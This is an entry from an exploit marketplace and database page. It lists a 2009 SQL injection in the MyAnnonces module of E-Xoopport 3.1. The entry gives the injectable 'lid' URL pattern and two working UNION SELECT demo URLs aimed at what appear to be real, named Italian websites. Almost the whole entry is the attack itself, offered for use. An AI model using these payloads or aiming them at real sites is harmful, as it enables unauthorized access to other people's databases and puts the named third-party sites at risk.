[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability

Author
Vrs-hCk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5522
Category
web applications
Date add
19-07-2009
Platform
unsorted
==================================================================
E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability
==================================================================


================================================================================================

 Title    : Remote SQL Injection Vulnerability
 Software : MyAnnonces Module for E-Xoopport 3.1
 Vendor   : http://www.e-xoopport.it/
 
 Date     : 17 July 2009 (Indonesia)
 Author   : Vrs-hCk

 ================================================================================================

 [-] Exploit

     http://[site]/[path]/modules/MyAnnonces/index.php?pa=viewannonces&lid=[SQLi]

 [-] Demo

     http://www.focolaccia.org/modules/MyAnnonces/index.php?pa=viewannonces&lid=-41' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7/*
     http://www.annuncisolidali.it/modules/MyAnnonces/index.php?pa=viewannonces&lid=-1946' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7/*

 ================================================================================================



#  0day.today [2024-11-14]  #